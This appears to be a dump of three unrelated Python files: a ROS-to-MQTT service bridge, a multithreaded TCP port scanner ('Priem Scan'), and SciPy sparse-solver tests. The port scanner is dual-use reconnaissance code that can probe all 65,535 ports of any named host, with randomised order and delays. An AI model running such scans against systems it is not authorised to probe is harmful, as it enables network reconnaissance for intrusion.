self._srv_type_name = srv_type
self._srv_type = lookup_object(self._srv_type_name)
try:
self._serviceproxy = rospy.Service(self._local_server, self._srv_type, self._ros_handler)
except Exception as e:
rospy.logwarn(e)
def _ros_handler(self, req):
responses = {}
lock = Condition()
def __response_handler(client, userdata, mqtt_msg):
msg_dict = self._deserialize(mqtt_msg.payload)
rospy.logdebug('got response for %s' % msg_dict['id'])
with lock:
responses[msg_dict['id']] = msg_dict['response']
lock.notifyAll()
rospy.logdebug('local service %s called.' % self._local_server)
# generate a unique ID
request_id = str(uuid4())
# build a request to send to the external client
request_message = {
"op": "call_service",
"id": request_id,
"response_topic": self._control_topic + '/service/response/' + request_id,
"type": self._srv_type_name,
"service": self._remote_server,
"args": extract_values(req)
}
# Adding the correct topic to subscribe to
self._mqtt_client.subscribe(request_message['response_topic'], qos=2)
self._mqtt_client.message_callback_add(request_message['response_topic'], __response_handler)
payload = bytearray(self._serialize(request_message))
self._mqtt_client.publish(
topic=self._mqtt_topic_request, payload=payload,
qos=2, retain=False)
# wait for a response
while not rospy.is_shutdown() and request_id not in responses.keys():
with lock:
lock.wait(1) # check for shutdown every 1 second
resp = responses[request_id]
del responses[request_id]
self._mqtt_client.unsubscribe(request_message['response_topic'])
# assemble response object
response_type = lookup_object(self._srv_type_name+"Response")
# create response object
r = response_type()
# and populate it
if resp is None:
rospy.logerr('Service Request could not be completed')
raise rospy.ROSException('Service Request could not be completed')
populate_instance(resp, r)
return r
__all__ = [
'create_bridge', 'Bridge', 'RosToMqttBridge', 'MqttToRosBridge',
'DynamicBridgeServer', 'SubscribeBridge', 'PublishBridge', 'RemoteService', 'LocalServiceProxy']
|
pscan.py
|
from argparse import ArgumentParser
from math import ceil, log
from re import match
from random import shuffle
from shutil import get_terminal_size
from socket import socket
from socket import AF_INET, SOCK_STREAM
from socket import error
from sys import argv, exit
from threading import Thread
from time import sleep, time
from typing import List, Optional
from datetime import timedelta
__author__ = "Jaymund Cyrus Floranza (CryptoNyxz)"
__version__ = (0, 1, 1)
__license__ = """
MIT License
Copyright (c) 2021 Jaymund Cyrus F. Floranza
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
# Utility Functions
def keyboard_interrupt() -> None:
"""
KeyboardInterrupt kill switch.
Runs when KeyboardInterrupt is triggered.
"""
print('\r\nAborted by user.\n', end='')
exit(-1)
# Classes
class ProgressBar:
"""
For displaying progress bars.
:param max_value: The upper limit of the progress bar.
"""
@staticmethod
def rescale(num: int or float, precision: Optional[int] = 1) -> str:
"""
Rescale the number by 10^3 to make it easier to read.
:param num: The number to be rescaled.
:param precision: The amount of precision of the
:return: The string representation of the rescaled number.
"""
scale = ['', 'K', 'M', 'B', 'T']
index = int(log(num, 1000)) if num and num != float("inf") else 0
rounded = round(num/pow(10, index), precision)
return f"{rounded}{scale[index]}"
def __init__(self, max_value: int or float):
self.max_value = max_value
self.current_val = 0
self.rate = None
self.start_time = None
self.start_value = None
self.stopped = True
@property
def done(self) -> bool:
"""
Return if already finished.
:return: The boolean value.
"""
return self.current_val >= self.max_value or self.stopped
def start(self):
"""Start the progress bar."""
self.stopped = False
self.start_time = time()
self.start_value = self.current_val
def stop(self):
"""Stop the progress bar."""
self.stopped = True
def add_progress(self, value: int or float):
"""
Count new progress.
:param value: Added progress value.
"""
if self.stopped:
return
self.current_val += value
def display(self):
"""Display the current progress."""
if self.stopped:
return
d_value = self.current_val - self.start_value
d_max_value = self.max_value - self.start_value
d_time = time() - self.start_time
length = int(0.35 * get_terminal_size().columns)
per = d_value/d_max_value
prog = int(length*per)
extra = length*round(per) > prog
prog_bar = '█'*prog + '▌'*extra
spaces = ' '*(length - (prog + extra))
rate = d_value/d_time if d_time else float('inf')
eta_s = round((d_max_value - d_value)/rate) if rate else \
None
eta = timedelta(seconds=eta_s) if eta_s is not None else '?'
clear_line = " "*(get_terminal_size().columns - 1)
print(f"{clear_line}\r"
"Progress: "
f"|{prog_bar}{spaces}| "
f"{100*per:.1f}% "
f"({ProgressBar.rescale(d_value)}) "
f"[{ProgressBar.rescale(rate)}/s] "
f"ETA: {eta}", end="\r")
def cont_display(self):
"""Continuously display progress bar using a separate Thread."""
def inner():
while not self.done and not self.stopped:
self.display()
sleep(5e-3)
self.display()
Thread(target=inner, daemon=False).start()
class PortScanner:
"""
The port scanner class.
:param randomized: If the port scan order should be randomized.
:param delay: The amount of delay in seconds between each port scan.
"""
@staticmethod
def pprint_port(host: str, ports: List[int],
duration: float or int) -> None:
"""
Display TCP ports in a more readable form.
:param host: The target host's address, IP address or domain name.
:param ports: The TCP ports to be displayed.
:param duration: The total duration of the scan.
"""
table_width = (get_terminal_size().columns // 7) - 2
table_height = ceil(len(ports) / table_width)
table_top = (
7 * ' '
+ '┌'
+ '─'*(table_width * 7)
+ '┐\r\n'
)
row_sep = '\r\n' + 7*' ' + '├' + '-'*(table_width * 7) + '┤\r\n'
table_bottom = (
'\r\n'
+ 7 * ' '
+ '└'
+ '─' * (table_width * 7)
+ '┘'
)
rows = [
7 * ' '
+ '│'
+ f"Open TCP Ports at {host} ({len(ports)})".center(7*table_width)
+ '│\r\n'
+ 7 * ' '
+ '│'
+ f"Scan took: {timedelta(seconds=duration)}".center(7*table_width)
+ '│'
]
rows += [
7 * ' '
+ '│'
+ ''.join([
str(port).center(7)
for port in ports[r*table_width: (r + 1)*table_width]
])
+ 7*' ' * (
table_width
- len(ports[r*table_width: (r + 1)*table_width])
)
+ '│'
for r in range(table_height)
]
print(table_top + row_sep.join(rows) + table_bottom)
def __init__(self, randomized: Optional[bool] = False,
delay: Optional[int or float] = 0):
self.randomized = randomized
self.delay = delay
# Last scan results
self.open_ports = []
self.scan_duration = 0
self.progress_bar = None
def check_open(self, host: str, port: int) -> int or None:
"""
Check if the host:port pair is open to TCP Connections.
:param host: The target host's address, IP address or domain name.
:param port: The target port to be checked.
:return: The port if open, None if not.
"""
try:
with socket(AF_INET, SOCK_STREAM) as sock:
sock.connect((host, port))
self.open_ports.append(port)
except error:
pass
except KeyboardInterrupt:
if isinstance(self.progress_bar, ProgressBar):
self.progress_bar.stop()
keyboard_interrupt()
finally:
if isinstance(self.progress_bar, ProgressBar):
self.progress_bar.add_progress(1)
def scan(self, host: str,
port_range: Optional[range] = range(1, 65536)) -> List[int]:
"""
Scan for open ports.
:param host: The target host's address, IP address or domain name.
:param port_range: The range of ports to scan.
:return: The list of open TCP ports.
"""
if not (port_range and
port_range.start >= 1 and port_range.stop <= 65536):
raise ValueError("Port number must be within range (1, 65536)")
time_init = time()
# Reset previous scan results
self.open_ports = []
# Initialize threads
threads = []
for i in range(len(port_range)):
threads.append(Thread(
target=self.check_open,
args=(host, port_range[i]),
daemon=False
))
# Shuffle thread order if randomized scan option is set
if self.randomized:
shuffle(threads)
# Display progress bar
self.progress_bar = ProgressBar(len(port_range))
self.progress_bar.start()
self.progress_bar.cont_display()
# Set up KeyboardInterrupt kill switch
try:
# Start the scan
for thread in threads:
thread.start()
sleep(self.delay)
# Wait while still scanning
while not self.progress_bar.done:
pass
except KeyboardInterrupt:
self.progress_bar.stop()
keyboard_interrupt()
else:
# A little cooldown to make sure progress bar finishes
# before displaying results
sleep(5e-2)
# Determine Scan Duration
self.scan_duration = time() - time_init
# Sort the results because it might not be in order due to
# the nature of multithreaded programs, or maybe the scan order
# was randomized
self.open_ports.sort()
return self.open_ports
# Shortened Functions
def port_scan(host: str, randomized: Optional[bool] = False,
delay: Optional[float or int] = 0,
port_range: Optional[range] = range(1, 65536),
pretty_print: Optional[bool] = False) -> List[int] or None:
"""
Scan target host for open TCP ports.
:param host: The target host's address, IP address or domain name.
:param randomized: If the port scan order should be randomized.
:param delay: The amount of delay in seconds between each port scan.
:param port_range: The range of ports to scan.
:param pretty_print: If the results should be pretty-printed instead of
returning the list of open ports.
:return: If pretty-printed, return None, if not, return the list of
open ports
"""
ps = None
try:
ps = PortScanner(randomized, delay)
open_ports = ps.scan(host, port_range)
if pretty_print:
PortScanner.pprint_port(host, open_ports, ps.scan_duration)
else:
return open_ports
except KeyboardInterrupt:
if isinstance(ps, PortScanner):
if isinstance(ps.progress_bar, ProgressBar):
ps.progress_bar.stop()
keyboard_interrupt()
if __name__ == "__main__":
parser = ArgumentParser(
prog="Priem Scan",
epilog="Scan for open TCP ports.\nMade by CryptoNyxz"
)
parser.add_argument('-r', '--random',
action='store_true',
help="Randomize the port scan order.")
parser.add_argument('-d', '--delay',
required=False,
type=float,
default=0,
help="The delay between each port scan.")
parser.add_argument('-P', '--portrange',
required=False,
type=str,
help="Port range, for example:\n"
"For ports 24 to 1024:\n"
"-p 24-1024")
parser.add_argument('-H', '--host',
required=True,
type=str,
help="The target host's address, "
"IP address or domain name")
if len(argv) > 1:
args = parser.parse_args()
if isinstance(args.portrange, str):
if not match(r'\d+-+\d', args.portrange):
print("Port range argument must follow the format: a-b")
exit(-2)
args.portrange = map(int, args.portrange.split('-'))
args.portrange = range(*args.portrange)
if not (args.portrange
and args.portrange.start >= 1
and args.portrange.stop <= 65536):
print("Port number must be within range (1, 65536)")
exit(-3)
else:
args.portrange = range(1, 65536)
port_scan(args.host, args.random, args.delay, args.portrange, True)
else:
parser.print_help()
|
test_linsolve.py
|
import sys
import threading
import numpy as np
from numpy import array, finfo, arange, eye, all, unique, ones, dot
import numpy.random as random
from numpy.testing import (
assert_array_almost_equal, assert_almost_equal,
assert_equal, assert_array_equal, assert_, assert_allclose,
assert_warns, suppress_warnings)
import pytest
from pytest import raises as assert_raises
import scipy.linalg
from scipy.linalg import norm, inv
from scipy.sparse import (spdiags, SparseEfficiencyWarning, csc_matrix,
csr_matrix, identity, isspmatrix, dok_matrix, lil_matrix, bsr_matrix)
from scipy.sparse.linalg import SuperLU
from scipy.sparse.linalg.dsolve import (spsolve, use_solver, splu, spilu,
MatrixRankWarning, _superlu, spsolve_triangular, factorized)
import scipy.sparse
from scipy._lib._testutils import check_free_memory
sup_sparse_efficiency = suppress_warnings()
sup_sparse_efficiency.filter(SparseEfficiencyWarning)
# scikits.umfpack is not a SciPy dependency but it is optionally used in
# dsolve, so check whether it's available
try:
import scikits.umfpack as umfpack
has_umfpack = True
except ImportError:
has_umfpack = False
def toarray(a):
if isspmatrix(a):
return a.toarray()
else:
return a
def setup_bug_8278():
N = 2 ** 6
h = 1/N
Ah1D = scipy.sparse.diags([-1, 2, -1], [-1, 0, 1],
shape=(N-1, N-1))/(h**2)
eyeN = scipy.sparse.eye(N - 1)
A = (scipy.sparse.kron(eyeN, scipy.sparse.kron(eyeN, Ah1D))
+ scipy.sparse.kron(eyeN, scipy.sparse.kron(Ah1D, eyeN))
+ scipy.sparse.kron(Ah1D, scipy.sparse.kron(eyeN, eyeN)))
b = np.random.rand((N-1)**3)
return A, b
class TestFactorized(object):
def setup_method(self):
n = 5
d = arange(n) + 1
self.n = n
self.A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n).tocsc()
random.seed(1234)
def _check_singular(self):
A = csc_matrix((5,5), dtype='d')
b = ones(5)
assert_array_almost_equal(0. * b, factorized(A)(b))
def _check_non_singular(self):
# Make a diagonal dominant, to make sure it is not singular
n = 5
a = csc_matrix(random.rand(n, n))
b = ones(n)
expected = splu(a).solve(b)
assert_array_almost_equal(factorized(a)(b), expected)
def test_singular_without_umfpack(self):
use_solver(useUmfpack=False)
with assert_raises(RuntimeError, match="Factor is exactly singular"):
self._check_singular()
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_singular_with_umfpack(self):
use_solver(useUmfpack=True)
with suppress_warnings() as sup:
sup.filter(RuntimeWarning, "divide by zero encountered in double_scalars")
assert_warns(umfpack.UmfpackWarning, self._check_singular)
def test_non_singular_without_umfpack(self):
use_solver(useUmfpack=False)
self._check_non_singular()
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_non_singular_with_umfpack(self):
use_solver(useUmfpack=True)
self._check_non_singular()
def test_cannot_factorize_nonsquare_matrix_without_umfpack(self):
use_solver(useUmfpack=False)
msg = "can only factor square matrices"
with assert_raises(ValueError, match=msg):
factorized(self.A[:, :4])
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_factorizes_nonsquare_matrix_with_umfpack(self):
use_solver(useUmfpack=True)
# does not raise
factorized(self.A[:,:4])
def test_call_with_incorrectly_sized_matrix_without_umfpack(self):
use_solver(useUmfpack=False)
solve = factorized(self.A)
b = random.rand(4)
B = random.rand(4, 3)
BB = random.rand(self.n, 3, 9)
with assert_raises(ValueError, match="is of incompatible size"):
solve(b)
with assert_raises(ValueError, match="is of incompatible size"):
solve(B)
with assert_raises(ValueError,
match="object too deep for desired array"):
solve(BB)
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_call_with_incorrectly_sized_matrix_with_umfpack(self):
use_solver(useUmfpack=True)
solve = factorized(self.A)
b = random.rand(4)
B = random.rand(4, 3)
BB = random.rand(self.n, 3, 9)
# does not raise
solve(b)
msg = "object too deep for desired array"
with assert_raises(ValueError, match=msg):
solve(B)
with assert_raises(ValueError, match=msg):
solve(BB)
def test_call_with_cast_to_complex_without_umfpack(self):
use_solver(useUmfpack=False)
solve = factorized(self.A)
b = random.rand(4)
for t in [np.complex64, np.complex128]:
with assert_raises(TypeError, match="Cannot cast array data"):
solve(b.astype(t))
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_call_with_cast_to_complex_with_umfpack(self):
use_solver(useUmfpack=True)
solve = factorized(self.A)
b = random.rand(4)
for t in [np.complex64, np.complex128]:
assert_warns(np.ComplexWarning, solve, b.astype(t))
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_assume_sorted_indices_flag(self):
# a sparse matrix with unsorted indices
unsorted_inds = np.array([2, 0, 1, 0])
data = np.array([10, 16, 5, 0.4])
indptr = np.array([0, 1, 2, 4])
A = csc_matrix((data, unsorted_inds, indptr), (3, 3))
b = ones(3)
# should raise when incorrectly assuming indices are sorted
use_solver(useUmfpack=True, assumeSortedIndices=True)
with assert_raises(RuntimeError,
match="UMFPACK_ERROR_invalid_matrix"):
factorized(A)
# should sort indices and succeed when not assuming indices are sorted
use_solver(useUmfpack=True, assumeSortedIndices=False)
expected = splu(A.copy()).solve(b)
assert_equal(A.has_sorted_indices, 0)
assert_array_almost_equal(factorized(A)(b), expected)
@pytest.mark.slow
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_bug_8278(self):
check_free_memory(8000)
use_solver(useUmfpack=True)
A, b = setup_bug_8278()
A = A.tocsc()
f = factorized(A)
x = f(b)
assert_array_almost_equal(A @ x, b)
class TestLinsolve(object):
def setup_method(self):
use_solver(useUmfpack=False)
def test_singular(self):
A = csc_matrix((5,5), dtype='d')
b = array([1, 2, 3, 4, 5],dtype='d')
with suppress_warnings() as sup:
sup.filter(MatrixRankWarning, "Matrix is exactly singular")
x = spsolve(A, b)
assert_(not np.isfinite(x).any())
def test_singular_gh_3312(self):
# "Bad" test case that leads SuperLU to call LAPACK with invalid
# arguments. Check that it fails moderately gracefully.
ij = np.array([(17, 0), (17, 6), (17, 12), (10, 13)], dtype=np.int32)
v = np.array([0.284213, 0.94933781, 0.15767017, 0.38797296])
A = csc_matrix((v, ij.T), shape=(20, 20))
b = np.arange(20)
try:
# should either raise a runtimeerror or return value
# appropriate for singular input
x = spsolve(A, b)
assert_(not np.isfinite(x).any())
except RuntimeError:
pass
def test_twodiags(self):
A = spdiags([[1, 2, 3, 4, 5], [6, 5, 8, 9, 10]], [0, 1], 5, 5)
b = array([1, 2, 3, 4, 5])
# condition number of A
cond_A = norm(A.todense(),2) * norm(inv(A.todense()),2)
for t in ['f','d','F','D']:
eps = finfo(t).eps # floating point epsilon
b = b.astype(t)
for format in ['csc','csr']:
Asp = A.astype(t).asformat(format)
x = spsolve(Asp,b)
assert_(norm(b - Asp*x) < 10 * cond_A * eps)
def test_bvector_smoketest(self):
Adense = array([[0., 1., 1.],
[1., 0., 1.],
[0., 0., 1.]])
As = csc_matrix(Adense)
random.seed(1234)
x = random.randn(3)
b = As*x
x2 = spsolve(As, b)
assert_array_almost_equal(x, x2)
def test_bmatrix_smoketest(self):
Adense = array([[0., 1., 1.],
[1., 0., 1.],
[0., 0., 1.]])
As = csc_matrix(Adense)
random.seed(1234)
x = random.randn(3, 4)
Bdense = As.dot(x)
Bs = csc_matrix(Bdense)
x2 = spsolve(As, Bs)
assert_array_almost_equal(x, x2.todense())
@sup_sparse_efficiency
def test_non_square(self):
# A is not square.
A = ones((3, 4))
b = ones((4, 1))
assert_raises(ValueError, spsolve, A, b)
# A2 and b2 have incompatible shapes.
A2 = csc_matrix(eye(3))
b2 = array([1.0, 2.0])
assert_raises(ValueError, spsolve, A2, b2)
@sup_sparse_efficiency
def test_example_comparison(self):
row = array([0,0,1,2,2,2])
col = array([0,2,2,0,1,2])
data = array([1,2,3,-4,5,6])
sM = csr_matrix((data,(row,col)), shape=(3,3), dtype=float)
M = sM.todense()
row = array([0,0,1,1,0,0])
col = array([0,2,1,1,0,0])
data = array([1,1,1,1,1,1])
sN = csr_matrix((data, (row,col)), shape=(3,3), dtype=float)
N = sN.todense()
sX = spsolve(sM, sN)
X = scipy.linalg.solve(M, N)
assert_array_almost_equal(X, sX.todense())
@sup_sparse_efficiency
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_shape_compatibility(self):
use_solver(useUmfpack=True)
A = csc_matrix([[1., 0], [0, 2]])
bs = [
[1, 6],
array([1, 6]),
[[1], [6]],
array([[1], [6]]),
csc_matrix([[1], [6]]),
csr_matrix([[1], [6]]),
dok_matrix([[1], [6]]),
bsr_matrix([[1], [6]]),
array([[1., 2., 3.], [6., 8., 10.]]),
csc_matrix([[1., 2., 3.], [6., 8., 10.]]),
csr_matrix([[1., 2., 3.], [6., 8., 10.]]),
dok_matrix([[1., 2., 3.], [6., 8., 10.]]),
bsr_matrix([[1., 2., 3.], [6., 8., 10.]]),
]
for b in bs:
x = np.linalg.solve(A.toarray(), toarray(b))
for spmattype in [csc_matrix, csr_matrix, dok_matrix, lil_matrix]:
x1 = spsolve(spmattype(A), b, use_umfpack=True)
x2 = spsolve(spmattype(A), b, use_umfpack=False)
# check solution
if x.ndim == 2 and x.shape[1] == 1:
# interprets also these as "vectors"
x = x.ravel()
assert_array_almost_equal(toarray(x1), x, err_msg=repr((b, spmattype, 1)))
assert_array_almost_equal(toarray(x2), x, err_msg=repr((b, spmattype, 2)))
# dense vs. sparse output ("vectors" are always dense)
if isspmatrix(b) and x.ndim > 1:
assert_(isspmatrix(x1), repr((b, spmattype, 1)))
assert_(isspmatrix(x2), repr((b, spmattype, 2)))
else:
assert_(isinstance(x1, np.ndarray), repr((b, spmattype, 1)))
assert_(isinstance(x2, np.ndarray), repr((b, spmattype, 2)))
# check output shape
if x.ndim == 1:
# "vector"
assert_equal(x1.shape, (A.shape[1],))
assert_equal(x2.shape, (A.shape[1],))
else:
# "matrix"
assert_equal(x1.shape, x.shape)
assert_equal(x2.shape, x.shape)
A = csc_matrix((3, 3))
b = csc_matrix((1, 3))
assert_raises(ValueError, spsolve, A, b)
@sup_sparse_efficiency
def test_ndarray_support(self):
A = array([[1., 2.], [2., 0.]])
x = array([[1., 1.], [0.5, -0.5]])
b = array([[2., 0.], [2., 2.]])
assert_array_almost_equal(x, spsolve(A, b))
def test_gssv_badinput(self):
N = 10
d = arange(N) + 1.0
A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), N, N)
for spmatrix in (csc_matrix, csr_matrix):
A = spmatrix(A)
b = np.arange(N)
def not_c_contig(x):
return x.repeat(2)[::2]
def not_1dim(x):
return x[:,None]
def bad_type(x):
return x.astype(bool)
def too_short(x):
return x[:-1]
badops = [not_c_contig, not_1dim, bad_type, too_short]
for badop in badops:
msg = f"{spmatrix!r} {badop!r}"
# Not C-contiguous
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, badop(A.data), A.indices, A.indptr,
b, int(spmatrix == csc_matrix), err_msg=msg)
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, A.data, badop(A.indices), A.indptr,
b, int(spmatrix == csc_matrix), err_msg=msg)
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, A.data, A.indices, badop(A.indptr),
b, int(spmatrix == csc_matrix), err_msg=msg)
def test_sparsity_preservation(self):
ident = csc_matrix([
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
b = csc_matrix([
[0, 1],
[1, 0],
[0, 0]])
x = spsolve(ident, b)
assert_equal(ident.nnz, 3)
assert_equal(b.nnz, 2)
assert_equal(x.nnz, 2)
assert_allclose(x.A, b.A, atol=1e-12, rtol=1e-12)
def test_dtype_cast(self):
A_real = scipy.sparse.csr_matrix([[1, 2, 0],
[0, 0, 3],
[4, 0, 5]])
A_complex = scipy.sparse.csr_matrix([[1, 2, 0],
[0, 0, 3],
[4, 0, 5 + 1j]])
b_real = np.array([1,1,1])
b_complex = np.array([1,1,1]) + 1j*np.array([1,1,1])
x = spsolve(A_real, b_real)
assert_(np.issubdtype(x.dtype, np.floating))
x = spsolve(A_real, b_complex)
assert_(np.issubdtype(x.dtype, np.complexfloating))
x = spsolve(A_complex, b_real)
assert_(np.issubdtype(x.dtype, np.complexfloating))
x = spsolve(A_complex, b_complex)
assert_(np.issubdtype(x.dtype, np.complexfloating))
@pytest.mark.slow
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_bug_8278(self):
check_free_memory(8000)
use_solver(useUmfpack=True)
A, b = setup_bug_8278()
x = spsolve(A, b)
assert_array_almost_equal(A @ x, b)
class TestSplu(object):
def setup_method(self):
use_solver(useUmfpack=False)
n = 40
d = arange(n) + 1
self.n = n
self.A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
random.seed(1234)
def _smoketest(self, spxlu, check, dtype):
if np.issubdtype(dtype, np.complexfloating):
A = self.A + 1j*self.A.T
else:
A = self.A
A = A.astype(dtype)
lu = spxlu(A)
rng = random.RandomState(1234)
# Input shapes
for k in [None, 1, 2, self.n, self.n+2]:
msg = f"k={k!r}"
if k is None:
b = rng.rand(self.n)
else:
b = rng.rand(self.n, k)
if np.issubdtype(dtype, np.complexfloating):
b = b + 1j*rng.rand(*b.shape)
b = b.astype(dtype)
x = lu.solve(b)
check(A, b, x, msg)
x = lu.solve(b, 'T')
check(A.T, b, x, msg)
x = lu.solve(b, 'H')
check(A.T.conj(), b, x, msg)
@sup_sparse_efficiency
def test_splu_smoketest(self):
self._internal_test_splu_smoketest()
def _internal_test_splu_smoketest(self):
# Check that splu works at all
def check(A, b, x, msg=""):
eps = np.finfo(A.dtype).eps
r = A * x
assert_(abs(r - b).max() < 1e3*eps, msg)
self._smoketest(splu, check, np.float32)
self._smoketest(splu, check, np.float64)
self._smoketest(splu, check, np.complex64)
self._smoketest(splu, check, np.complex128)
@sup_sparse_efficiency
def test_spilu_smoketest(self):
self._internal_test_spilu_smoketest()
def _internal_test_spilu_smoketest(self):
errors = []
def check(A, b, x, msg=""):
r = A * x
err = abs(r - b).max()
assert_(err < 1e-2, msg)
if b.dtype in (np.float64, np.complex128):
errors.append(err)
self._smoketest(spilu, check, np.float32)
self._smoketest(spilu, check, np.float64)
self._smoketest(spilu, check, np.complex64)
self._smoketest(spilu, check, np.complex128)
assert_(max(errors) > 1e-5)
@sup_sparse_efficiency
def test_spilu_drop_rule(self):
# Test passing in the drop_rule argument to spilu.
A = identity(2)
rules = [
b'basic,area'.decode('ascii'), # unicode
b'basic,area', # ascii
[b'basic', b'area'.decode('ascii')]
]
for rule in rules:
# Argument should be accepted
assert_(isinstance(spilu(A, drop_rule=rule), SuperLU))
def test_splu_nnz0(self):
A = csc_matrix((5,5), dtype='d')
assert_raises(RuntimeError, splu, A)
def test_spilu_nnz0(self):
A = csc_matrix((5,5), dtype='d')
assert_raises(RuntimeError, spilu, A)
def test_splu_basic(self):
# Test basic splu functionality.
n = 30
rng = random.RandomState(12)
a = rng.rand(n, n)
a[a < 0.95] = 0
# First test with a singular matrix
a[:, 0] = 0
a_ = csc_matrix(a)
# Matrix is exactly singular
assert_raises(RuntimeError, splu, a_)
# Make a diagonal dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
b = ones(n)
x = lu.solve(b)
assert_almost_equal(dot(a, x), b)
def test_splu_perm(self):
# Test the permutation vectors exposed by splu.
n = 30
a = random.random((n, n))
a[a < 0.95] = 0
# Make a diagonal dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
# Check that the permutation indices do belong to [0, n-1].
for perm in (lu.perm_r, lu.perm_c):
assert_(all(perm > -1))
assert_(all(perm < n))
assert_equal(len(unique(perm)), len(perm))
# Now make a symmetric, and test that the two permutation vectors are
# the same
# Note: a += a.T relies on undefined behavior.
a = a + a.T
a_ = csc_matrix(a)
lu = splu(a_)
assert_array_equal(lu.perm_r, lu.perm_c)
@pytest.mark.parametrize("splu_fun, rtol", [(splu, 1e-7), (spilu, 1e-1)])
def test_natural_permc(self, splu_fun, rtol):
# Test that the "NATURAL" permc_spec does not permute the matrix
np.random.seed(42)
n = 500
p = 0.01
A = scipy.sparse.random(n, n, p)
x = np.random.rand(n)
# Make A diagonal dominant to make sure it is not singular
A += (n+1)*scipy.sparse.identity(n)
A_ = csc_matrix(A)
b = A_ @ x
# without permc_spec, permutation is not identity
lu = splu_fun(A_)
assert_(np.any(lu.perm_c != np.arange(n)))
# with permc_spec="NATURAL", permutation is identity
lu = splu_fun(A_, permc_spec="NATURAL")
assert_array_equal(lu.perm_c, np.arange(n))
# Also, lu decomposition is valid
x2 = lu.solve(b)
assert_allclose(x, x2, rtol=rtol)
@pytest.mark.skipif(not hasattr(sys, 'getrefcount'), reason="no sys.getrefcount")
def test_lu_refcount(self):
# Test that we are keeping track of the reference count with splu.
n = 30
a = random.random((n, n))
a[a < 0.95] = 0
# Make a diagonal dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
# And now test that we don't have a refcount bug
rc = sys.getrefcount(lu)
for attr in ('perm_r', 'perm_c'):
perm = getattr(lu, attr)
assert_equal(sys.getrefcount(lu), rc + 1)
del perm
assert_equal(sys.getrefcount(lu), rc)
def test_bad_inputs(self):
A = self.A.tocsc()
assert_raises(ValueError, splu, A[:,:4])
assert_raises(ValueError, spilu, A[:,:4])
for lu in [splu(A), spilu(A)]:
b = random.rand(42)
B = random.rand(42, 3)
BB = random.rand(self.n, 3, 9)
assert_raises(ValueError, lu.solve, b)
assert_raises(ValueError, lu.solve, B)
assert_raises(ValueError, lu.solve, BB)
assert_raises(TypeError, lu.solve,
b.astype(np.complex64))
assert_raises(TypeError, lu.solve,
b.astype(np.complex128))
@sup_sparse_efficiency
def test_superlu_dlamch_i386_nan(self):
# SuperLU 4.3 calls some functions returning floats without
# declaring them. On i386@linux call convention, this fails to
# clear floating point registers after call. As a result, NaN
# can appear in the next floating point operation made.
#
# Here's a test case that triggered the issue.
n = 8
d = np.arange(n) + 1
A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
A = A.astype(np.float32)
spilu(A)
A = A + 1j*A
B = A.A
assert_(not np.isnan(B).any())
@sup_sparse_efficiency
def test_lu_attr(self):
def check(dtype, complex_2=False):
A = self.A.astype(dtype)
if complex_2:
A = A + 1j*A.T
n = A.shape[0]
lu = splu(A)
# Check that the decomposition is as advertized
Pc = np.zeros((n, n))
Pc[np.arange(n), lu.perm_c] = 1
Pr = np.zeros((n, n))
Pr[lu.perm_r, np.arange(n)] = 1
Ad = A.toarray()
lhs = Pr.dot(Ad).dot(Pc)
rhs = (lu.L * lu.U).toarray()
eps = np.finfo(dtype).eps
assert_allclose(lhs, rhs, atol=100*eps)
check(np.float32)
check(np.float64)
check(np.complex64)
check(np.complex128)
check(np.complex64, True)
check(np.complex128, True)
@pytest.mark.slow
@sup_sparse_efficiency
def test_threads_parallel(self):
oks = []
def worker():
try:
self.test_splu_basic()
self._internal_test_splu_smoketest()
self._internal_test_spilu_smoketest()
oks.append(True)
except Exception:
pass
threads = [threading.Thread(target=worker)
for k in range(20)]
for t in threads:
t.start()
for t in threads:
t.join()
assert_equal(len(oks), 20)
class TestSpsolveTriangular(object):
def setup_method(self):
use_solver(useUmfpack=False)
def test_singular(self):
n = 5
A = csr_matrix((n, n))
b = np.arange(n)
for lower in (True, False):
assert_raises(scipy.linalg.LinAlgError, spsolve_triangular, A, b, lower=lower)
@sup_sparse_efficiency
def test_bad_shape(self):
# A is not square.
A = np.zeros((3, 4))
b = ones((4, 1))
assert_raises(ValueError, spsolve_triangular, A, b)
# A2 and b2 have incompatible shapes.
A2 = csr_matrix(eye(3))
b2 = array([1.0, 2.0])
assert_raises(ValueError, spsolve_triangular, A2, b2)
